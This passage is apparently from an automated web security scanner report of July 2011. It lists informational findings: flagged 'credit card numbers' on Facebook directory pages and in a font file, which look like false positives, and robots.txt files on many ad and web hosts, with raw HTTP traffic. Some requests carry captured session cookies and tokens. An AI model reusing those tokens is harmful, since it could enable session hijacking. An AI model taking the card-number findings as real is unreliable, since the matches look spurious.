Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 19 Jul 2011 14:01:23 GMT
Date: Tue, 19 Jul 2011 14:20:13 GMT
Expires: Tue, 19 Jul 2011 14:20:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

25. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


25.1. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...
<a href="http://www.facebook.com/directory/pages/A-3023041-3055200">
...[SNIP]...
<a href="http://www.facebook.com/directory/pages/A-3055201-3087360">
...[SNIP]...
<a href="http://www.facebook.com/directory/pages/A-3601921-3634080">
...[SNIP]...

25.2. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...
<a href="http://www.facebook.com/directory/people/A-35843881-36297600">
...[SNIP]...
<a href="http://www.facebook.com/directory/people/A-41288521-41742240">
...[SNIP]...
<a href="http://www.facebook.com/directory/people/A-49455481-49909200">
...[SNIP]...
<a href="http://www.facebook.com/directory/people/A-51724081-52177800">
...[SNIP]...

25.3. http://www.livedrive.com/Scripts/colaborate-medium_regular.typeface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /Scripts/colaborate-medium_regular.typeface.js

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /Scripts/colaborate-medium_regular.typeface.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 08:27:36 GMT
Accept-Ranges: bytes
ETag: "0ce452319cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:22:36 GMT
Connection: close
Content-Length: 67466

if (_typeface_js && _typeface_js.loadFace) _typeface_js.loadFace({"glyphs":{"S":{"x_min":89,"x_max":728.953125,"ha":825,"o":"m 728 233 b 447 536 728 430 576 490 b 266 669 351 570 266 597 b 433 781 266
...[SNIP]...
536 768 l 806 118 "},"..":{"x_min":34.71875,"x_max":965.28125,"ha":1000,"o":"m 965 450 b 500 913 965 713 763 913 b 34 450 240 913 34 711 b 500 -13 34 188 240 -13 b 965 450 759 -13 965 188 m 869 450 b 500 73 869 244 705 73 b 130 450 294 73 130 244 b 500 826 130 658 290 826 b 869 450 708 826 869 656 m 654 187 l 622 276 b 501 243 579 258 545 243 b 362 448 398 243 362 316 b 505 647 362 573 400 647 b 615 618 545 647 580 633
...[SNIP]...
587 372 l 359 372 l 477 704 l 587 372 m 608 1045 b 492 1159 608 1111 558 1159 b 377 1045 428 1159 377 1109 b 492 931 377 983 430 931 b 608 1045 556 931 608 981 m 549 1047 b 492 988 549 1016 531 988 b 434 1047 458 988 434 1020 b 492 1105 434 1076 458 1105 b 549 1047 528 1105 549 1079 "},"..":{"x_min":75,"x_max":994.453125,"ha":1069,"o":"m 994 0 l 606 898 l 462 898 l 75 0 l 994 0 m 806 118 l 265 118 l 536 768 l 806 118
...[SNIP]...
9 311 761 287 793 b 346 877 287 848 311 877 b 403 819 382 877 403 851 "},"..":{"x_min":0,"x_max":0,"ha":375},"0":{"x_min":52.78125,"x_max":697.21875,"ha":750,"o":"m 697 427 b 373 862 697 697 627 862 b 52 427 137 862 52 697 b 372 -23 52 155 118 -23 b 697 427 629 -23 697 156 m 522 427 b 372 106 522 241 505 106 b 227 427 237 106 227 231 b 373 731 227 591 238 731 b 522 427 508 731 522 620 "},"...":{"x_min":55.5625,"x_max":5
...[SNIP]...
08 b 262 446 338 108 262 199 b 505 782 262 682 340 782 b 744 446 668 782 744 685 m 736 1050 l 652 1090 b 581 1027 645 1066 620 1027 b 445 1090 538 1027 505 1090 b 290 985 368 1090 325 1066 l 373 946 b 444 1000 383 975 405 1000 b 584 938 487 1000 511 938 b 736 1050 652 938 713 981 "},"..":{"x_min":75,"x_max":677.78125,"ha":738,"o":"m 677 320 b 415 652 677 497 605 652 b 248 551 337 652 284 601 l 248 912 l 91 912 l 91 194 b 75 -279 91 114 84 -204 l
...[SNIP]...
462 285 l 462 182 "},"..":{"x_min":34.71875,"x_max":965.28125,"ha":1000,"o":"m 965 450 b 500 913 965 713 763 913 b 34 450 240 913 34 711 b 500 -13 34 188 240 -13 b 965 450 759 -13 965 188 m 869 450 b 500 73 869 244 705 73 b 130 450 294 73 130 244 b 500 826 130 658 290 826 b 869 450 708 826 869 656 m 726 179 l 556 406 b 690 562 658 422 690 490 b 506 720 690 690 593 720 l 305 720 l 305 179 l 411 179 l 411 404 l 433 404 l
...[SNIP]...

26. Robots.txt file  previous  next
There are 86 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


26.1. http://0.gravatar.com/avatar/a9253565cd7a0a613c1147db0e66e6f0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/a9253565cd7a0a613c1147db0e66e6f0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

26.2. http://040-eex-147.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://040-eex-147.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 040-eex-147.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:37 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "5d21f5-18-3ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.3. http://1.gravatar.com/avatar/16984fd773fe4e40c9cb0e60ff81e600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/16984fd773fe4e40c9cb0e60ff81e600

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

26.4. http://624-vqc-743.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://624-vqc-743.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 624-vqc-743.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:45 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "458d85-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.5. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:10 GMT
Server: Apache/2.2.9
Last-Modified: Wed, 27 Oct 2010 13:56:47 GMT
ETag: "18063c-1a-4939998a3e5c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.6. http://a.ok.facebook.com/cm/bk/9998-58063-3840-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.ok.facebook.com
Path:   /cm/bk/9998-58063-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.ok.facebook.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:57:51 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

26.7. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.8. http://a1.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15551243
Date: Tue, 19 Jul 2011 12:23:40 GMT
Connection: close

User-agent: *
Disallow: /

26.9. http://a2.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14210744
Date: Tue, 19 Jul 2011 12:23:43 GMT
Connection: close

User-agent: *
Disallow: /

26.10. http://a3.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a3.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a3.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15552000
Date: Tue, 19 Jul 2011 12:23:50 GMT
Connection: close

User-agent: *
Disallow: /

26.11. http://a4.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14879884
Date: Tue, 19 Jul 2011 23:01:40 GMT
Connection: close

User-agent: *
Disallow: /

26.12. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 19 Jul 2011 14:58:33 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.13. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2003 22:04:31 GMT
ETag: "22ffd3-87-3c4e1b86d79c0"
Accept-Ranges: bytes
Content-Length: 135
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/

26.14. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 22:26:02 GMT
ETag: "53000e-1a-4a7e6c8eaf280"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 20:42:55 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.15. http://api.bing.com/qsonhs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Content-Length: 1907
Content-Type: text/plain
Last-Modified: Wed, 01 Jun 2011 23:39:52 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Akamai-TestID: b22488a5e5b941f8bf0992c37c5e8db7
Cache-Control: public, max-age=12049435
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

26.16. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820d-1a-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

26.18. http://bing.fansnap.com/la/pi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /la/pi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bing.fansnap.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
X-Runtime: 1
ETag: "f71d20196d4caf35b6a670db8c70b03d"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CXaKeGBjoLb2Zmc2V0af6QnQ%3D%3D--6716d6e12c1a428e86490bcfee9193c657c427bd; domain=fansnap.com; path=/; HttpOnly
Content-Length: 26
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

26.19. http://blog.linode.com/2011/07/13/introducing-nodebalancer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linode.com
Path:   /2011/07/13/introducing-nodebalancer/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.linode.com

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 14:31:40 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Cookie
X-Pingback: http://blog.linode.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.20. http://boston.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:33 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=7;expires=Wed, 22-Jun-2016 20:43:33 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.21. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 19 Jul 2011 20:43:12 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

26.22. http://cache.boston.com/universal/js/twitterwidget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.boston.com
Path:   /universal/js/twitterwidget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.boston.com

Response

HTTP/1.1 200 OK
